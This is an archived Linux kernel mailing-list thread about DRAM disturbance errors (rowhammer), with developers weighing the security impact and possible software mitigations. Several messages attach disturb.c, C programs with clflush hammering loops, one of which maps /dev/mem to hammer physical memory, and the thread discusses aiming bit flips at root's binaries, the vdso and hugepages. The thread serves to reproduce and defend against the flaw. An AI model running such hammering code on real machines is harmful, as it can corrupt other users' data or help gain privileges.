* DRAM unreliable under specific access patern
@ 2014-12-24 16:38 Pavel Machek
2014-12-24 16:46 ` Pavel Machek
` (2 more replies)
0 siblings, 3 replies; 29+ messages in thread
From: Pavel Machek @ 2014-12-24 16:38 UTC (permalink / raw)
To: kernel list
Hi!
It seems that it is easy to induce DRAM bit errors by doing repeated
reads from adjacent memory cells on common hw. Details are at
https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf
. Older memory modules seem to work better, and ECC should detect
this. Paper has inner loop that should trigger this.
Workarounds seem to be at hardware level, and tricky, too.
Does anyone have implementation of detector? Any ideas how to work
around it in software?
Pavel
--
(english) http://www.livejournal.com/~pavelmachek
(cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html
^ permalink raw reply [flat|nested] 29+ messages in thread* Re: DRAM unreliable under specific access patern 2014-12-24 16:38 DRAM unreliable under specific access patern Pavel Machek @ 2014-12-24 16:46 ` Pavel Machek 2014-12-24 17:13 ` Andy Lutomirski 2014-12-28 9:18 ` Willy Tarreau 2 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-24 16:46 UTC (permalink / raw) To: kernel list, yoongukim, donghyu1, omutlu Hi! (I added original researches to the list). I see you have FPGA-based detector, and probably PC based detector, too. Would it be possible to share sources of the PC based one? Thanks, Pavel On Wed 2014-12-24 17:38:23, Pavel Machek wrote: > Hi! > > It seems that it is easy to induce DRAM bit errors by doing repeated > reads from adjacent memory cells on common hw. Details are at > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > . Older memory modules seem to work better, and ECC should detect > this. Paper has inner loop that should trigger this. > > Workarounds seem to be at hardware level, and tricky, too. > > Does anyone have implementation of detector? Any ideas how to work > around it in software? > > Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 16:38 DRAM unreliable under specific access patern Pavel Machek 2014-12-24 16:46 ` Pavel Machek @ 2014-12-24 17:13 ` Andy Lutomirski 2014-12-24 17:25 ` Pavel Machek 2014-12-28 9:18 ` Willy Tarreau 2 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2014-12-24 17:13 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: > Hi! > > It seems that it is easy to induce DRAM bit errors by doing repeated > reads from adjacent memory cells on common hw. Details are at > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > . Older memory modules seem to work better, and ECC should detect > this. Paper has inner loop that should trigger this. > > Workarounds seem to be at hardware level, and tricky, too. One mostly-effective solution would be to stop buying computers without ECC. Unfortunately, no one seems to sell non-server chips that can do ECC. > > Does anyone have implementation of detector? Any ideas how to work > around it in software? > Platform-dependent page coloring with very strict, and impossible to implement fully correctly, page allocation constraints? --Andy > Pavel > -- > (english) http://www.livejournal.com/~pavelmachek > (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 17:13 ` Andy Lutomirski @ 2014-12-24 17:25 ` Pavel Machek 2014-12-24 17:38 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2014-12-24 17:25 UTC (permalink / raw) To: Andy Lutomirski; +Cc: kernel list [-- Attachment #1: Type: text/plain, Size: 1590 bytes --] On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: > On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: > > Hi! > > > > It seems that it is easy to induce DRAM bit errors by doing repeated > > reads from adjacent memory cells on common hw. Details are at > > > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > > > > . Older memory modules seem to work better, and ECC should detect > > this. Paper has inner loop that should trigger this. > > > > Workarounds seem to be at hardware level, and tricky, too. > > One mostly-effective solution would be to stop buying computers > without ECC. Unfortunately, no one seems to sell non-server chips > that can do ECC. Or keep using old computers :-). > > Does anyone have implementation of detector? Any ideas how to work > > around it in software? > > > > Platform-dependent page coloring with very strict, and impossible to > implement fully correctly, page allocation constraints? This seems to be at cacheline level, not at page level, if I understand it correctly. So the problem would is: I have something mapped read-only, and I can still cause bitflips in it. Hmm. So it is pretty obviously a security problem, no need for java. Just do some bit flips in binary root is going to run, and it will crash for him. You can map binaries read-only, so you have enough access. As far as I understand it, attached program could reproduce it on affected machines? Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html [-- Attachment #2: disturb.c --] [-- Type: text/x-csrc, Size: 803 bytes --] /* -*- linux-c -*- * * Try to trigger DRAM disturbance errors, as described in * * https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf * * Copyright 2014 Pavel Machek <pavel@ucw.cz>, GPLv2+. */ #include <stdlib.h> #include <stdio.h> #include <string.h> void disturb(char *where) { unsigned int i; for (i=0; i<0x1000000; i++) { __asm__ __volatile__( "movl 0(%0), %%eax \n" \ "movl 64(%0), %%eax \n" \ "clflush 0(%0) \n" \ "clflush 64(%0) \n" \ "mfence" :: "r" (where) : "eax" ); } } int main(int argc, char *argv[]) { long size = 1*1024*1024; long i; unsigned char *mem; mem = malloc(size); memset(mem, 0xff, size); for (i=0; i<128; i+=4) disturb(mem+i); for (i=0; i<size; i++) if (mem[i] != 0xff) printf("At %lx, got %x\n", i, mem[i]); } ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 17:25 ` Pavel Machek @ 2014-12-24 17:38 ` Andy Lutomirski 2014-12-24 17:50 ` Pavel Machek 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2014-12-24 17:38 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list On Wed, Dec 24, 2014 at 9:25 AM, Pavel Machek <pavel@ucw.cz> wrote: > On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: >> On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: >> > Hi! >> > >> > It seems that it is easy to induce DRAM bit errors by doing repeated >> > reads from adjacent memory cells on common hw. Details are at >> > >> > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf >> > >> > . Older memory modules seem to work better, and ECC should detect >> > this. Paper has inner loop that should trigger this. >> > >> > Workarounds seem to be at hardware level, and tricky, too. >> >> One mostly-effective solution would be to stop buying computers >> without ECC. Unfortunately, no one seems to sell non-server chips >> that can do ECC. > > Or keep using old computers :-). > >> > Does anyone have implementation of detector? Any ideas how to work >> > around it in software? >> > >> >> Platform-dependent page coloring with very strict, and impossible to >> implement fully correctly, page allocation constraints? > > This seems to be at cacheline level, not at page level, if I > understand it correctly. > > So the problem would is: I have something mapped read-only, and I can > still cause bitflips in it. > > Hmm. So it is pretty obviously a security problem, no need for > java. Just do some bit flips in binary root is going to run, and it > will crash for him. You can map binaries read-only, so you have enough > access. Right. So we're mostly screwed. > > As far as I understand it, attached program could reproduce it on > affected machines? I thought that article suggested using addresses 8M (is that 8 megabytes?) apart for the two accesses. --Andy > Pavel > -- > (english) http://www.livejournal.com/~pavelmachek > (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 17:38 ` Andy Lutomirski @ 2014-12-24 17:50 ` Pavel Machek 2014-12-29 12:13 ` Jiri Kosina 0 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2014-12-24 17:50 UTC (permalink / raw) To: Andy Lutomirski; +Cc: kernel list On Wed 2014-12-24 09:38:22, Andy Lutomirski wrote: > On Wed, Dec 24, 2014 at 9:25 AM, Pavel Machek <pavel@ucw.cz> wrote: > > On Wed 2014-12-24 09:13:32, Andy Lutomirski wrote: > >> On Wed, Dec 24, 2014 at 8:38 AM, Pavel Machek <pavel@ucw.cz> wrote: > >> > Hi! > >> > > >> > It seems that it is easy to induce DRAM bit errors by doing repeated > >> > reads from adjacent memory cells on common hw. Details are at > >> > > >> > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf > >> > > >> > . Older memory modules seem to work better, and ECC should detect > >> > this. Paper has inner loop that should trigger this. > >> > > >> > Workarounds seem to be at hardware level, and tricky, too. > >> > >> One mostly-effective solution would be to stop buying computers > >> without ECC. Unfortunately, no one seems to sell non-server chips > >> that can do ECC. > > > > Or keep using old computers :-). > > > >> > Does anyone have implementation of detector? Any ideas how to work > >> > around it in software? > >> > > >> > >> Platform-dependent page coloring with very strict, and impossible to > >> implement fully correctly, page allocation constraints? > > > > This seems to be at cacheline level, not at page level, if I > > understand it correctly. > > > > So the problem would is: I have something mapped read-only, and I can > > still cause bitflips in it. > > > > Hmm. So it is pretty obviously a security problem, no need for > > java. Just do some bit flips in binary root is going to run, and it > > will crash for him. You can map binaries read-only, so you have enough > > access. > Right. So we're mostly screwed. Well... We could periodically scrub (every few miliseconds) pages mapped to userspace. We might be able to do some magic and disallow cache flushes to userspace programs. We might be able to use performance metrics to detect heavy readers. We might be able to reprogram DRAM controller to refresh more often. Or we may switch to AMD systems as they seem to be less suspectible :-). Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 17:50 ` Pavel Machek @ 2014-12-29 12:13 ` Jiri Kosina 2014-12-29 17:09 ` Pavel Machek 0 siblings, 1 reply; 29+ messages in thread From: Jiri Kosina @ 2014-12-29 12:13 UTC (permalink / raw) To: Pavel Machek; +Cc: Andy Lutomirski, kernel list, yoongukim, donghyu1, omutlu On Wed, 24 Dec 2014, Pavel Machek wrote: > Well... We could periodically scrub (every few miliseconds) pages > mapped to userspace. I.e. implement ECC in software. Would be extremely slow though. > We might be able to do some magic and disallow cache flushes to > userspace programs. My understanding is that cflush is not strictly necessary, it only makes the issue more likely to trigger. If you modify the pattern so that it neraly fits into cacheline (but not really), you would be able to produce similar (if not the same) cache eviction pattern as if without explicit cflush. Right? -- Jiri Kosina SUSE Labs ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-29 12:13 ` Jiri Kosina @ 2014-12-29 17:09 ` Pavel Machek 0 siblings, 0 replies; 29+ messages in thread From: Pavel Machek @ 2014-12-29 17:09 UTC (permalink / raw) To: Jiri Kosina; +Cc: Andy Lutomirski, kernel list, yoongukim, donghyu1, omutlu On Mon 2014-12-29 13:13:17, Jiri Kosina wrote: > On Wed, 24 Dec 2014, Pavel Machek wrote: > > > Well... We could periodically scrub (every few miliseconds) pages > > mapped to userspace. > > I.e. implement ECC in software. Would be extremely slow though. No, not really. If you read the cells that are about to go bad, you'll update them. Agreed on extremely slow. > > We might be able to do some magic and disallow cache flushes to > > userspace programs. > > My understanding is that cflush is not strictly necessary, it only makes > the issue more likely to trigger. Umm. Not really, AFAICT. So, the memory can take "certain ammount" of "neighboring accesses". You need to do that ammount before next refresh. > If you modify the pattern so that it neraly fits into cacheline (but not > really), you would be able to produce similar (if not the same) cache > eviction pattern as if without explicit cflush. Right? No, I don't think so. Well.. you need to generate certain ammount of traffic on the address lines, and it corrupts "neighboring" cells. I wish I knew more about DRAM... If you'll read a cache line, you can't "break" it as reads refreshes it. You need to do few miliseconds worth of reads, AFAICT. If you'll just keep reading cachelines, the cachelines you read will not be "neighboring" enough to the "target" cells you want to break. Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 16:38 DRAM unreliable under specific access patern Pavel Machek 2014-12-24 16:46 ` Pavel Machek 2014-12-24 17:13 ` Andy Lutomirski @ 2014-12-28 9:18 ` Willy Tarreau 2 siblings, 0 replies; 29+ messages in thread From: Willy Tarreau @ 2014-12-28 9:18 UTC (permalink / raw) To: Pavel Machek; +Cc: kernel list Hi Pavel, On Wed, Dec 24, 2014 at 05:38:23PM +0100, Pavel Machek wrote: > Hi! > > It seems that it is easy to induce DRAM bit errors by doing repeated > reads from adjacent memory cells on common hw. Details are at > > https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf Extremely interesting stuff. I've always wondered if such modules were *that* reliable given how picky they are about all timings. > . Older memory modules seem to work better, and ECC should detect > this. Paper has inner loop that should trigger this. > > Workarounds seem to be at hardware level, and tricky, too. > > Does anyone have implementation of detector? Any ideas how to work > around it in software? Maybe reserve some memory "canary" that is periodically scanned and observe changes there. That will not tell you for sure that something has not been done, but it will tell you for sure that bits were flipped. Also I'm wondering whether perf counters on certain CPUs could be used to detect the abnormal number of clflushes or even the memory access pattern (will not work in multi-socket environments if a user has one dedicated CPU though). Thanks for sharing the link! Willy ^ permalink raw reply [flat|nested] 29+ messages in thread
[parent not found: <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com>]
* Re: DRAM unreliable under specific access patern [not found] <CAL82V5NN8U4PyiSjLxgpTrgsgkbM7rRCbVF5P-HHyEqphLOy+g@mail.gmail.com> @ 2014-12-24 22:08 ` Pavel Machek 2015-01-05 19:23 ` One Thousand Gnomes 2014-12-24 22:27 ` Pavel Machek 2014-12-24 23:41 ` Pavel Machek 2 siblings, 1 reply; 29+ messages in thread From: Pavel Machek @ 2014-12-24 22:08 UTC (permalink / raw) To: Mark Seaborn, kernel list; +Cc: luto [-- Attachment #1: Type: text/plain, Size: 1474 bytes --] Hi! > Try this test program: https://github.com/mseaborn/rowhammer-test > > It has reproduced bit flips on various machines. > > Your program won't be an effective test because you're just hammering > addresses x and x+64, which will typically be in the same row of > DRAM. Yep, I found out I was wrong in the meantime. > For the test to be effective, you have to pick addresses that are in > different rows but in the same bank. A good way of doing that is just to > pick random pairs of addresses (as the test program above does). If the > machine has 16 banks of DRAM (as many of the machines I've tested on do), > there will be a 1/16 chance that the two addresses are in the same > bank. How long does it normally teake to reproduce something on the bad machine? > [Replying off-list just because I'm not subscribed to lkml and only saw > this thread via the web, but feel free to reply on the list. :-) ] Will do. (Actually, it is ok to reply to lkml even if you are not subscribed; lkml is open list.). In the meantime, I created test that actually uses physical memory, 8MB apart, as described in some footnote. It is attached. It should work, but it needs boot with specific config options and specific kernel parameters. [Unfortunately, I don't have new-enough machine handy]. Best regards, Pavel -- (english) http://www.livejournal.com/~pavelmachek (cesky, pictures) http://atrey.karlin.mff.cuni.cz/~pavel/picture/horses/blog.html [-- Attachment #2: disturb.c --] [-- Type: text/x-csrc, Size: 1847 bytes --] /* -*- linux-c -*- * * Try to trigger DRAM disturbance errors, as described in * * https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf * * Copyright 2014 Pavel Machek <pavel@ucw.cz>, GPLv2+. * * You need to run this on cca 2GB machine, or adjust size below. * CONFIG_STRICT_DEVMEM must not be set. * Boot with "nopat mem=2G" */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> void disturb(char *w1, char *w2) { /* As far as I could tell... this loop should be run for cca 128msec, to run for one full refresh cycle. */ unsigned int i; for (i=0; i< 672000; i++) { __asm__ __volatile__( "movl 0(%0), %%eax \n" \ "movl 0(%1), %%eax \n" \ "clflush 0(%0) \n" \ "clflush 0(%1) \n" \ "mfence" :: "r" (w1), "r" (w2) : "eax" ); } } int main(int argc, char *argv[]) { /* Ok, so we have one memory for checking, but we do need direct access to /dev/mem to access physical memory. /* This needs at least 2GB RAM machine */ long size = 1*1024*1024*1024; long i; unsigned char *mem, *map; int fd; if (size & (size-1)) { printf("Need power of two size\n"); return 1; } mem = malloc(size); memset(mem, 0xff, size); fd = open("/dev/mem", O_RDONLY); // fd = open("/tmp/delme", O_RDONLY); errno = 0; /* We want to avoid low 1MB */ map = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 1*1024*1024); if (errno) { printf("Can not mmap ram: %m\n"); return 1; } /* DRAM operates by whole cachelines, so it should not matter which byte in cacheline we access. */ #define MEG8 (8*1024*1024) for (i=0; i<(size-MEG8)/100; i+=4096-64) disturb(map+i, map+i+MEG8); for (i=0; i<size; i++) if (mem[i] != 0xff) printf("At %lx, got %x\n", i, mem[i]); } [-- Attachment #3: disturb.c --] [-- Type: text/x-csrc, Size: 1847 bytes --] /* -*- linux-c -*- * * Try to trigger DRAM disturbance errors, as described in * * https://www.ece.cmu.edu/~safari/pubs/kim-isca14.pdf * * Copyright 2014 Pavel Machek <pavel@ucw.cz>, GPLv2+. * * You need to run this on cca 2GB machine, or adjust size below. * CONFIG_STRICT_DEVMEM must not be set. * Boot with "nopat mem=2G" */ #include <stdlib.h> #include <stdio.h> #include <string.h> #include <sys/mman.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include <errno.h> void disturb(char *w1, char *w2) { /* As far as I could tell... this loop should be run for cca 128msec, to run for one full refresh cycle. */ unsigned int i; for (i=0; i< 672000; i++) { __asm__ __volatile__( "movl 0(%0), %%eax \n" \ "movl 0(%1), %%eax \n" \ "clflush 0(%0) \n" \ "clflush 0(%1) \n" \ "mfence" :: "r" (w1), "r" (w2) : "eax" ); } } int main(int argc, char *argv[]) { /* Ok, so we have one memory for checking, but we do need direct access to /dev/mem to access physical memory. /* This needs at least 2GB RAM machine */ long size = 1*1024*1024*1024; long i; unsigned char *mem, *map; int fd; if (size & (size-1)) { printf("Need power of two size\n"); return 1; } mem = malloc(size); memset(mem, 0xff, size); fd = open("/dev/mem", O_RDONLY); // fd = open("/tmp/delme", O_RDONLY); errno = 0; /* We want to avoid low 1MB */ map = mmap(NULL, size, PROT_READ, MAP_SHARED, fd, 1*1024*1024); if (errno) { printf("Can not mmap ram: %m\n"); return 1; } /* DRAM operates by whole cachelines, so it should not matter which byte in cacheline we access. */ #define MEG8 (8*1024*1024) for (i=0; i<(size-MEG8)/100; i+=4096-64) disturb(map+i, map+i+MEG8); for (i=0; i<size; i++) if (mem[i] != 0xff) printf("At %lx, got %x\n", i, mem[i]); } ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2014-12-24 22:08 ` Pavel Machek @ 2015-01-05 19:23 ` One Thousand Gnomes 2015-01-05 19:50 ` Andy Lutomirski 2015-01-06 23:20 ` Pavel Machek 0 siblings, 2 replies; 29+ messages in thread From: One Thousand Gnomes @ 2015-01-05 19:23 UTC (permalink / raw) To: Pavel Machek; +Cc: Mark Seaborn, kernel list, luto > In the meantime, I created test that actually uses physical memory, > 8MB apart, as described in some footnote. It is attached. It should > work, but it needs boot with specific config options and specific > kernel parameters. Why not just use hugepages. You know the alignment guarantees for 1GB pages and that means you don't even need to be root In fact - should we be disabling 1GB huge page support by default at this point, at least on non ECC boxes ? Alan ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-05 19:23 ` One Thousand Gnomes @ 2015-01-05 19:50 ` Andy Lutomirski 2015-01-06 1:47 ` Kirill A. Shutemov 2015-01-06 23:20 ` Pavel Machek 1 sibling, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-01-05 19:50 UTC (permalink / raw) To: One Thousand Gnomes; +Cc: Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes <gnomes@lxorguk.ukuu.org.uk> wrote: >> In the meantime, I created test that actually uses physical memory, >> 8MB apart, as described in some footnote. It is attached. It should >> work, but it needs boot with specific config options and specific >> kernel parameters. > > Why not just use hugepages. You know the alignment guarantees for 1GB > pages and that means you don't even need to be root > > In fact - should we be disabling 1GB huge page support by default at this > point, at least on non ECC boxes ? Can you actually damage anyone else's data using a 1 GB hugepage? --Andy > > Alan -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-05 19:50 ` Andy Lutomirski @ 2015-01-06 1:47 ` Kirill A. Shutemov 2015-01-06 1:57 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Kirill A. Shutemov @ 2015-01-06 1:47 UTC (permalink / raw) To: Andy Lutomirski Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: > On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes > <gnomes@lxorguk.ukuu.org.uk> wrote: > >> In the meantime, I created test that actually uses physical memory, > >> 8MB apart, as described in some footnote. It is attached. It should > >> work, but it needs boot with specific config options and specific > >> kernel parameters. > > > > Why not just use hugepages. You know the alignment guarantees for 1GB > > pages and that means you don't even need to be root > > > > In fact - should we be disabling 1GB huge page support by default at this > > point, at least on non ECC boxes ? > > Can you actually damage anyone else's data using a 1 GB hugepage? hugetlbfs is a filesystem: the answer is yes. Although I don't see the issue as a big attach vector. -- Kirill A. Shutemov ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 1:47 ` Kirill A. Shutemov @ 2015-01-06 1:57 ` Andy Lutomirski 2015-01-06 2:18 ` Kirill A. Shutemov 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-01-06 1:57 UTC (permalink / raw) To: Kirill A. Shutemov Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes >> <gnomes@lxorguk.ukuu.org.uk> wrote: >> >> In the meantime, I created test that actually uses physical memory, >> >> 8MB apart, as described in some footnote. It is attached. It should >> >> work, but it needs boot with specific config options and specific >> >> kernel parameters. >> > >> > Why not just use hugepages. You know the alignment guarantees for 1GB >> > pages and that means you don't even need to be root >> > >> > In fact - should we be disabling 1GB huge page support by default at this >> > point, at least on non ECC boxes ? >> >> Can you actually damage anyone else's data using a 1 GB hugepage? > > hugetlbfs is a filesystem: the answer is yes. Although I don't see the > issue as a big attach vector. What I mean is: if I map a 1 GB hugepage and rowhammer it, is it likely that the corruption will be confined to the same 1 GB? --Andy > > -- > Kirill A. Shutemov -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 1:57 ` Andy Lutomirski @ 2015-01-06 2:18 ` Kirill A. Shutemov 2015-01-06 2:26 ` Andy Lutomirski 0 siblings, 1 reply; 29+ messages in thread From: Kirill A. Shutemov @ 2015-01-06 2:18 UTC (permalink / raw) To: Andy Lutomirski Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 05, 2015 at 05:57:24PM -0800, Andy Lutomirski wrote: > On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: > >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes > >> <gnomes@lxorguk.ukuu.org.uk> wrote: > >> >> In the meantime, I created test that actually uses physical memory, > >> >> 8MB apart, as described in some footnote. It is attached. It should > >> >> work, but it needs boot with specific config options and specific > >> >> kernel parameters. > >> > > >> > Why not just use hugepages. You know the alignment guarantees for 1GB > >> > pages and that means you don't even need to be root > >> > > >> > In fact - should we be disabling 1GB huge page support by default at this > >> > point, at least on non ECC boxes ? > >> > >> Can you actually damage anyone else's data using a 1 GB hugepage? > > > > hugetlbfs is a filesystem: the answer is yes. Although I don't see the > > issue as a big attach vector. > > What I mean is: if I map a 1 GB hugepage and rowhammer it, is it > likely that the corruption will be confined to the same 1 GB? I don't know for sure, but it looks likely to me according to claim in the paper (8MB). But it still can be sombody else's data: 644 file on hugetlbfs mmap()ed r/o by anyone. When I read the paper I thought that vdso would be interesting target for the attack, but having all these constrains in place, it's hard aim the attack anything widely used. -- Kirill A. Shutemov ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 2:18 ` Kirill A. Shutemov @ 2015-01-06 2:26 ` Andy Lutomirski 2015-01-08 13:03 ` One Thousand Gnomes 0 siblings, 1 reply; 29+ messages in thread From: Andy Lutomirski @ 2015-01-06 2:26 UTC (permalink / raw) To: Kirill A. Shutemov Cc: One Thousand Gnomes, Pavel Machek, Mark Seaborn, kernel list On Mon, Jan 5, 2015 at 6:18 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > On Mon, Jan 05, 2015 at 05:57:24PM -0800, Andy Lutomirski wrote: >> On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: >> > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: >> >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes >> >> <gnomes@lxorguk.ukuu.org.uk> wrote: >> >> >> In the meantime, I created test that actually uses physical memory, >> >> >> 8MB apart, as described in some footnote. It is attached. It should >> >> >> work, but it needs boot with specific config options and specific >> >> >> kernel parameters. >> >> > >> >> > Why not just use hugepages. You know the alignment guarantees for 1GB >> >> > pages and that means you don't even need to be root >> >> > >> >> > In fact - should we be disabling 1GB huge page support by default at this >> >> > point, at least on non ECC boxes ? >> >> >> >> Can you actually damage anyone else's data using a 1 GB hugepage? >> > >> > hugetlbfs is a filesystem: the answer is yes. Although I don't see the >> > issue as a big attach vector. >> >> What I mean is: if I map a 1 GB hugepage and rowhammer it, is it >> likely that the corruption will be confined to the same 1 GB? > > I don't know for sure, but it looks likely to me according to claim in the > paper (8MB). But it still can be sombody else's data: 644 file on > hugetlbfs mmap()ed r/o by anyone. > > When I read the paper I thought that vdso would be interesting target for > the attack, but having all these constrains in place, it's hard aim the > attack anything widely used. > The vdso and the vvar page are both at probably-well-known physical addresses, so you can at least target the kernel a little bit. I *think* that kASLR helps a little bit here. --Andy > -- > Kirill A. Shutemov -- Andy Lutomirski AMA Capital Management, LLC ^ permalink raw reply [flat|nested] 29+ messages in thread
* Re: DRAM unreliable under specific access patern 2015-01-06 2:26 ` Andy Lutomirski @ 2015-01-08 13:03 ` One Thousand Gnomes 2015-01-08 16:52 ` Pavel Machek 2015-01-09 15:50 ` Vlastimil Babka 0 siblings, 2 replies; 29+ messages in thread From: One Thousand Gnomes @ 2015-01-08 13:03 UTC (permalink / raw) To: Andy Lutomirski Cc: Kirill A. Shutemov, Pavel Machek, Mark Seaborn, kernel list On Mon, 5 Jan 2015 18:26:07 -0800 Andy Lutomirski <luto@amacapital.net> wrote: > On Mon, Jan 5, 2015 at 6:18 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > > On Mon, Jan 05, 2015 at 05:57:24PM -0800, Andy Lutomirski wrote: > >> On Mon, Jan 5, 2015 at 5:47 PM, Kirill A. Shutemov <kirill@shutemov.name> wrote: > >> > On Mon, Jan 05, 2015 at 11:50:04AM -0800, Andy Lutomirski wrote: > >> >> On Mon, Jan 5, 2015 at 11:23 AM, One Thousand Gnomes > >> >> <gnomes@lxorguk.ukuu.org.uk> wrote: > >> >> >> In the meantime, I created test that actually uses physical memory, > >> >> >> 8MB apart, as described in some footnote. It is attached. It should > >> >> >> work, but it needs boot with specific config options and specific > >> >> >> kernel parameters. > >> >> > > >> >> > Why not just use hugepages. You know the alignment guarantees for 1GB > >> >> > pages and that means you don't even need to be root > >> >> > > >> >> > In fact - should we be disabling 1GB huge page support by default at this > >> >> > point, at least on non ECC boxes ? > >> >> > >> >> Can you actually damage anyone else's data using a 1 GB hugepage? > >> > > >> > hugetlbfs is a filesystem: the answer is yes. Although I don't see the > >> > issue as a big attach vector. > >> > >> What I mean is: if I map a 1 GB hugepage and rowhammer it, is it > >> likely that the corruption will be confined to the same 1 GB? > > > > I don't know for sure, but it looks likely to me according to claim in the > > paper (8MB). But it still can be sombody else's data: 644 file on > > hugetlbfs mmap()ed r/o by anyone. Thats less of a concern I think. As far as I can tell it would depend how the memory is wired what actually gets hit. I'm not clear if its within the range or not. > > When I read the paper I thought that vdso would be interesting target for > > the attack, but having all these constrains in place, it's hard aim the > > attack anything widely used. > > > > The vdso and the vvar page are both at probably-well-known physical > addresses, so you can at least target the kernel a little bit. I > *think* that kASLR helps a little bit here. SMEP likewise if you were able to use 1GB to corrupt matching lines elsewhere in RAM (eg the syscall table), but that would I think depend how the RAM is physically configured. Thats why the large TLB case worries me. With 4K pages and to an extent with 2MB pages its actually quite hard to line up an attack if you know something about the target. With 1GB hugepages you control the lower bits of the physical address precisely. The question is whether that merely enables you to decide where to shoot yourself or it goes beyond that ? (Outside HPC anyway: for HPC cases it bites both ways I suspect - you've got the ability to ensure you don't hit those access patterns while using 1GB pages, but also nothing to randomise stuff to make them unlikely if you happen to have worst case aligned data). ^ permalink raw reply [flat|nested] 29+ messages in thread
